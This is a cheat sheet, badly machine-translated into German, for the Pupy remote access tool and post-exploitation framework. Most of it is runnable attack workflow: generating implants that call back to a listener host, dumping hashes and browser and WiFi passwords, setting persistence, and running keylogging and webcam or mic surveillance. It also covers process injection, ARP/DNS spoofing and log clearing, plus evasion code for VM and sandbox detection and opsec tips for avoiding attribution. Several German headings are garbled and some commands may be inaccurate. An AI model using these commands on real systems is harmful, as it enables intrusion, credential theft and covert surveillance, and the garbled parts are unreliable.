Pupy C2 Framework Cheat Sheet

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

Pupy ist ein Open-Source-, Cross-Platform Remote Access Tool (RAT) und Post-Exploitation Framework geschrieben in Python und C. Es unterstützt Windows-, Linux-, OSX- und Android-Plattformen mit Memory-only Ausführung Fähigkeiten und minimale Footprint-Design.

ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.

Installation

Gierinstallation

```bash

Clone repository

git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy

Install dependencies (Ubuntu/Debian)

sudo apt-get install python2.7-dev python-pip python-setuptools build-essential swig python-dev libssl-dev libffi-dev

Install Python requirements

pip install -r pupy/requirements.txt

Create workspace

./create-workspace.py -DG pupyws cd pupyws ```_

Docker Installation

```bash

Build Docker image

git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy docker build -t pupy .

Run Pupy in Docker

docker run -it -v /tmp/pupyws:/opt/pupy/pupyws pupy ```_

Windows Installation

```bash

Install Python 2.7

Download and install Microsoft Visual C++ Compiler for Python 2.7

Clone repository

git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy

Install requirements

pip install -r pupy/requirements.txt

Create workspace

python create-workspace.py pupyws cd pupyws ```_

Basisnutzung

Beginn des Pupy Servers

```bash

Start server with default configuration

./pupysh

Start with custom configuration

./pupysh --config custom_config.py

Start with specific transport

./pupysh --transport ssl ```_

Client Generation

```bash

Generate Windows client

gen -f client -O windows -A x86 -o windows_client.exe

Generate Linux client

gen -f client -O linux -A x64 -o linux_client

Generate Android APK

gen -f apk -o android_client.apk ```_

Befehlsnummer

Serververwaltung

Command	Description
help	Show help menu
sessions	List active sessions
session -i <id>	Interact with session
jobs	List running jobs
kill <job_id>	Kill running job
exit	Exit Pupy server

Client Generation

Command	Description
gen -h	Show generation help
gen -f client -O <os> -A <arch>	Generate client
gen -f apk	Generate Android APK
gen -f py	Generate Python payload
gen -f ps1	Generate PowerShell payload

Sitzungs-Interaktion

Command	Description
info	Show session information
shell	Get interactive shell
upload <local> <remote>	Upload file
download <remote> <local>	Download file
screenshot	Take screenshot
webcam_snap	Take webcam snapshot
keylogger	Start keylogger

Optionen der Client-Generierung

Windows Clients

```bash

Windows executable (x86)

gen -f client -O windows -A x86 -o windows_x86.exe

Windows executable (x64)

gen -f client -O windows -A x64 -o windows_x64.exe

Windows DLL

gen -f dll -O windows -A x86 -o windows_dll.dll

Windows service executable

gen -f client -O windows -A x64 --service -o windows_service.exe

PowerShell payload

gen -f ps1 -o payload.ps1 ```_

Linux Clients

```bash

Linux ELF (x86)

gen -f client -O linux -A x86 -o linux_x86

Linux ELF (x64)

gen -f client -O linux -A x64 -o linux_x64

Linux shared library

gen -f so -O linux -A x64 -o linux_lib.so

Python payload

gen -f py -o payload.py ```_

macOS Clients

```bash

macOS binary

gen -f client -O darwin -A x64 -o macos_client

macOS application bundle

gen -f app -O darwin -A x64 -o macos_app.app ```_

Android Clients

```bash

Android APK

gen -f apk -o android_client.apk

Android APK with custom package name

gen -f apk --package com.example.app -o custom_android.apk ```_

Transportmöglichkeiten

SSL Transport

```bash

Start SSL listener

listen --port 443 ssl

Generate client with SSL transport

gen -f client -O windows -A x64 --transport ssl_connect --host 192.168.1.100:443 ```_

HTTP Transport

```bash

Start HTTP listener

listen --port 80 http

Generate client with HTTP transport

gen -f client -O windows -A x64 --transport http --host 192.168.1.100:80 ```_

TCP Transport

```bash

Start TCP listener

listen --port 4444 tcp

Generate client with TCP transport

gen -f client -O windows -A x64 --transport tcp_cleartext --host 192.168.1.100:4444 ```_

Transporte

```bash

Obfs3 transport

listen --port 8080 obfs3

Generate client with obfs3

gen -f client -O windows -A x64 --transport obfs3 --host 192.168.1.100:8080 ```_

Post-Exploitationsmodule

Systeminformationen

```bash

Get system information

run sysinfo

Get environment variables

run getenv

Get installed software

run installed_software

Get running processes

run ps

Get network connections

run netstat ```_

Credential Harvesting

```bash

Dump Windows credentials

run hashdump

Extract browser passwords

run browser_dump

Dump WiFi passwords

run wifi_passwords

Extract clipboard content

run clipboard ```_

Persistenz

```bash

Install persistence

run persistence

Create scheduled task (Windows)

run schtasks

Registry persistence (Windows)

run registry_persistence

Cron job persistence (Linux)

run cron_persistence ```_

Netzwerkaktivitäten

```bash

Port scanning

run portscan -t 192.168.1.0/24

Network discovery

run network_discovery

ARP spoofing

run arp_spoof -t 192.168.1.10 -g 192.168.1.1

DNS spoofing

run dns_spoof -d example.com -i 192.168.1.100 ```_

Überwachung

```bash

Start keylogger

run keylogger

Take screenshot

run screenshot

Record microphone

run record_mic -t 30

Webcam snapshot

run webcam_snap

Webcam stream

run webcam_stream ```_

Erweiterte Funktionen

Ausführung des Speichers

```bash

Load module in memory

load_module /path/to/module.py

Execute in memory

run memory_exec -f /path/to/executable

Reflective DLL loading (Windows)

run reflective_dll -f /path/to/dll.dll ```_

Prozessinjektion

```bash

Inject into process

run inject -p -f /path/to/payload

Process hollowing

run process_hollow -t notepad.exe -f /path/to/payload

DLL injection

run dll_inject -p -f /path/to/dll.dll ```_

Pivot

```bash

SOCKS proxy

run socks -p 1080

Port forwarding

run portfwd -L 8080:192.168.2.10:80

Reverse port forwarding

run portfwd -R 9090:127.0.0.1:22 ```_

Anti-Forensik

```bash

Clear event logs (Windows)

run clear_logs

Timestomp files

run timestomp -f /path/to/file -t "2020-01-01 12:00:00"

Secure delete

run secure_delete -f /path/to/file

Clear tracks

run clear_tracks ```_

Evasion Techniken

Belastbarkeit

```bash

Generate with packer

gen -f client -O windows -A x64 --packer upx -o packed_client.exe

Custom obfuscation

gen -f client -O windows -A x64 --obfuscate -o obfuscated_client.exe

Encrypted payload

gen -f client -O windows -A x64 --encrypt -o encrypted_client.exe ```_

Antianalyse

```python

VM detection

def check_vm(): import subprocess try: output = subprocess.check_output(['systeminfo'], shell=True) vm_indicators = ['VMware', 'VirtualBox', 'QEMU', 'Hyper-V'] for indicator in vm_indicators: if indicator in output.decode(): return True except: pass return False

Sandbox evasion

import time import random time.sleep(random.randint(60, 300)) # Random sleep ```_

Verkehrsobfukation

```bash

Domain fronting

gen -f client -O windows -A x64 --transport http --host cdn.example.com --front-domain legitimate-site.com

Custom User-Agent

gen -f client -O windows -A x64 --transport http --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" ```_

Konfiguration

Serverkonfiguration

```python

pupy.conf

[pupyd] workdir = pupyws scriptlets_path = packages/all;packages/windows;packages/linux;packages/darwin

[ssl] keyfile = keys/server.key certfile = keys/server.crt

[http] port = 80 ssl_port = 443

[logging] level = INFO file = pupy.log ```_

Client Konfiguration

```python

Custom transport configuration

TRANSPORT_KWARGS = \\{ 'ssl': \\{ 'cert_reqs': ssl.CERT_NONE, 'ssl_version': ssl.PROTOCOL_TLSv1_2, 'ciphers': 'ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM' \\}, 'http': \\{ 'user_agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'headers': \\{'Accept': 'text/html,application/xhtml+xml'\\}, 'proxy': \\{'http': 'http://proxy:8080'\\} \\} \\} ```_

Fehlerbehebung

Verbindungsprobleme

```bash

Check listener status

jobs

Test connectivity

telnet server_ip port

Check firewall rules

iptables -L netsh advfirewall show allprofiles ```_

Probleme der Client Generation

```bash

Install missing dependencies

pip install -r pupy/requirements.txt

Rebuild client templates

./create-workspace.py -DG pupyws

Check Python version

python --version # Should be 2.7.x ```_

Modul Fehler laden

```bash

Update module path

export PYTHONPATH=$PYTHONPATH:/opt/pupy/pupy

Reinstall requirements

pip install --upgrade -r pupy/requirements.txt

Check module dependencies

python -c "import module_name" ```_

Leistungsfragen

```bash

Reduce beacon interval

session -i set_beacon_interval 30

Optimize transport

Use faster transports like TCP for internal networks

Use compressed transports for slow connections

```_

Operationelle Sicherheit

Infrastrukturaufbau

• Verwenden Sie Umleitungen und Proxyketten
• Durchführung ordnungsgemäßer Zertifikatsverwaltung
• Verwenden Sie legitime Domains und Hosting
• Infrastruktur regelmäßig drehen
• Monitor für Erkennung und Zuschreibung

Kommunikationssicherheit

• Verwenden Sie verschlüsselte Transporte (SSL/TLS)
• Umsetzung der richtigen Schlüsselverwaltung
• Domänenfront verwenden, wo möglich
• Vary Kommunikationsmuster
• Implementierung der richtigen Fehlerbehandlung

Sicherheit am Arbeitsplatz

• Verwenden Sie die Fettbildung und Verpackung
• Implementieren von Anti-Analyse-Techniken
• Verwenden Sie gestufte Nutzlasten, wenn möglich
• Regelmäßig aktualisieren und rotieren Nutzlasten
• Test gegen aktuelle AV-Lösungen

Ressourcen

• Pupy GitHub Repository
• (LINK_4_)
• n1nj4sec Blog
• Pupy Module Referenz

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Pupy C2 Framework. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *